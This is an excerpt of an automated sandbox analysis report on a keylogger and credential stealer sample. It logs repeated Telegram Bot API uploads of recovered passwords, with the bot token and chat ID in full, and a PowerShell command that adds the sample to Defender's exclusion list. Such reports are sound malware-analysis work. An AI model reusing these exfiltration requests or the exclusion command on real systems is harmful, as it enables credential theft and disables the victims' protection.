Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:53 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":41019,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546873,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.7 | 50024 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:54 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3cc36a30dbf7
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
2025-01-10 22:07:54 UTC | 585 | OUT | Data Ascii: --------------------------8dd3cc36a30dbf7Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:54 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:54 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:54 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":41020,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546874,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.7 | 50025 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:55 UTC | 377 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3d1e894396a8
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            Connection: Keep-Alive
2025-01-10 22:07:55 UTC | 585 | OUT | Data Ascii: --------------------------8dd3d1e894396a8Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:55 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:55 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:55 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":41021,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546875,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.7 | 50026 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:56 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3d660101deb3
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
2025-01-10 22:07:56 UTC | 585 | OUT | Data Ascii: --------------------------8dd3d660101deb3Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:56 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:56 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:56 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":41022,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546876,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.7 | 50027 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:57 UTC | 377 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3daa9f561b06
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            Connection: Keep-Alive
2025-01-10 22:07:57 UTC | 585 | OUT | Data Ascii: --------------------------8dd3daa9f561b06Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:08:00 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:08:00 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:08:00 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":41023,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546880,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.7 | 50028 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:08:01 UTC | 377 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3eeb5953a21e
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            Connection: Keep-Alive
2025-01-10 22:08:01 UTC | 585 | OUT | Data Ascii: --------------------------8dd3eeb5953a21eContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:08:01 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:08:01 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:08:01 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":41024,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546881,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.7 | 50029 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:08:02 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3f3a5e4d32a9
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
2025-01-10 22:08:02 UTC | 585 | OUT | Data Ascii: --------------------------8dd3f3a5e4d32a9Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:08:02 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:08:02 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:08:02 UTC | 534 | IN |
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41025,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546882,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.7 | 50030 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:08:03 UTC | 377 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3f8930aa35eb
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            Connection: Keep-Alive
2025-01-10 22:08:03 UTC | 585 | OUT |
                                                                                                            Data Ascii: --------------------------8dd3f8930aa35ebContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:08:03 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:08:03 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:08:03 UTC | 534 | IN |
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41026,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546883,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.7 | 50031 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:08:04 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd41b206a536e3
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
2025-01-10 22:08:04 UTC | 585 | OUT |
                                                                                                            Data Ascii: --------------------------8dd41b206a536e3Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:08:04 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:08:04 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:08:04 UTC | 534 | IN |
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41027,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546884,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.7 | 50032 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:08:05 UTC | 377 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd423c7dda7c4d
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            Connection: Keep-Alive
2025-01-10 22:08:05 UTC | 585 | OUT |
                                                                                                            Data Ascii: --------------------------8dd423c7dda7c4dContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:08:08 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:08:08 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:08:08 UTC | 534 | IN |
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41028,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546888,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.7 | 50033 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:08:09 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd7f79d79e94a6
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
2025-01-10 22:08:09 UTC | 585 | OUT |
                                                                                                            Data Ascii: --------------------------8dd7f79d79e94a6Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:08:09 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:08:09 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:08:09 UTC | 534 | IN |
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41029,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546889,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.7 | 50034 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:08:10 UTC | 377 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8ddccaa63d3a385
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            Connection: Keep-Alive
2025-01-10 22:08:10 UTC | 585 | OUT |
                                                                                                            Data Ascii: --------------------------8ddccaa63d3a385Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:08:10 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:08:10 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:08:10 UTC | 534 | IN |
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41030,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546890,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.7 | 50035 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:08:11 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8de095da994ecc8
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
2025-01-10 22:08:11 UTC | 585 | OUT |
                                                                                                            Data Ascii: --------------------------8de095da994ecc8Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                           2025-01-10 22:08:11 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:08:11 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                           2025-01-10 22:08:11 UTC | 534 | IN
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41031,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546891,"document"


                                                                                                            Target ID:0
                                                                                                            Start time:17:06:20
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\Yef4EqsQha.exe"
                                                                                                            Imagebase:0x700000
                                                                                                            File size:865'792 bytes
                                                                                                            MD5 hash:91CCCCF28BCD650FC1F8E5256891211C
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:3
                                                                                                            Start time:17:06:21
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe"
                                                                                                            Imagebase:0x700000
                                                                                                            File size:433'152 bytes
                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:4
                                                                                                            Start time:17:06:21
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Users\user\Desktop\Yef4EqsQha.exe"
                                                                                                            Imagebase:0x320000
                                                                                                            File size:865'792 bytes
                                                                                                            MD5 hash:91CCCCF28BCD650FC1F8E5256891211C
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:5
                                                                                                            Start time:17:06:21
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:6
                                                                                                            Start time:17:06:21
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\Yef4EqsQha.exe"
                                                                                                            Imagebase:0x4a0000
                                                                                                            File size:865'792 bytes
                                                                                                            MD5 hash:91CCCCF28BCD650FC1F8E5256891211C
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:false

                                                                                                            Target ID:7
                                                                                                            Start time:17:06:23
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                            Imagebase:0x7ff7fb730000
                                                                                                            File size:496'640 bytes
                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:9.7%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:162
                                                                                                              Total number of Limit Nodes:6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1396328735.0000000008C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_8c50000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (oq$4'q$4'q$4'q$4'q
                                                                                                              • API String ID: 0-921078497
                                                                                                              • Opcode ID: 74d81e7a46bf6c71b4c94fe464a4616c71d5c674e8ce0a2c1af396425d182601
                                                                                                              • Instruction ID: 932124931211db35b775cdf16062bd38895ac5d322939d0ec714a707bf7811ac
                                                                                                              • Opcode Fuzzy Hash: 74d81e7a46bf6c71b4c94fe464a4616c71d5c674e8ce0a2c1af396425d182601
